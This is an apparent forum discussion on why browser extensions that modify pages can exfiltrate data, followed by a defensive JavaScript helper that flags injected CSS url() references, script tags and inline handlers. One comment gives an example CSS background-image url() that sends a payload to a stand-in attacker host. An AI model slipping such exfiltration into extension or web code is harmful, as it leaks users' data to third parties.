But you have all the code and you know which functions/methods/etc. can do requests, so it should be trivial... either way, if it is not a solvable problem, there is a major problem in the design.
Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.
>It could do all the processing locally, easily...
That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind, see my other post: https://news.ycombinator.com/item?id=25623281
Depends on what your addon does. Most addons modify the page in some way. It's also not limited to injecting JavaScript. You can also exfiltrate data by injecting CSS (e.g. doing something like background-image: url("http://evil.example/?payload=...")) or do JavaScript injection in alternate ways (e.g. adding a <script> element, or adding an onclick attribute).
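
Added example, not part of the thread: a triage helper for reviewing content an extension injects into a page, flagging the three channels the comment above names (CSS url() references, <script> elements, on* attributes). The function name, the allowlist parameter and the sample origins are assumptions made for illustration.

```javascript
// Regex-based triage aid for reviewing extension-injected CSS/HTML.
// It is not a parser: it reports at most one on* handler per tag and can
// be fooled by unusual quoting, so use it to prioritise manual review.
const CSS_URL = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;
const SCRIPT_TAG = /<script\b[^>]*>/gi;
const SRC_ATTR = /\bsrc\s*=\s*(['"]?)([^'"\s>]+)\1/i;
const ON_ATTR = /<[^>]*\s(on[a-z]+)\s*=/gi;

// Resolve a reference against the page and return its origin, or null.
function originOf(ref, pageOrigin) {
  try {
    return new URL(ref, pageOrigin).origin;
  } catch {
    return null; // unparseable reference
  }
}

// Returns a list of { kind, target } findings for one injected snippet.
function auditInjectedContent(snippet, pageOrigin, allowedOrigins = []) {
  const allowed = new Set([pageOrigin, ...allowedOrigins]);
  const findings = [];
  const external = (ref) => {
    if (/^\s*data:/i.test(ref)) return false; // embedded data, no request
    const origin = originOf(ref, pageOrigin);
    return origin === null || !allowed.has(origin);
  };
  // Channel 1: CSS url() pointing at an origin outside the allowlist.
  for (const m of snippet.matchAll(CSS_URL)) {
    if (external(m[2])) findings.push({ kind: "css-url", target: m[2] });
  }
  // Channel 2: <script> elements, inline or loaded from another origin.
  for (const m of snippet.matchAll(SCRIPT_TAG)) {
    const src = m[0].match(SRC_ATTR);
    if (!src) findings.push({ kind: "inline-script", target: null });
    else if (external(src[2])) findings.push({ kind: "script-src", target: src[2] });
  }
  // Channel 3: inline event-handler attributes such as onclick.
  for (const m of snippet.matchAll(ON_ATTR)) {
    findings.push({ kind: "inline-handler", target: m[1].toLowerCase() });
  }
  return findings;
}
```

A finding means "look at this by hand"; an empty result does not show that the injected content makes no requests.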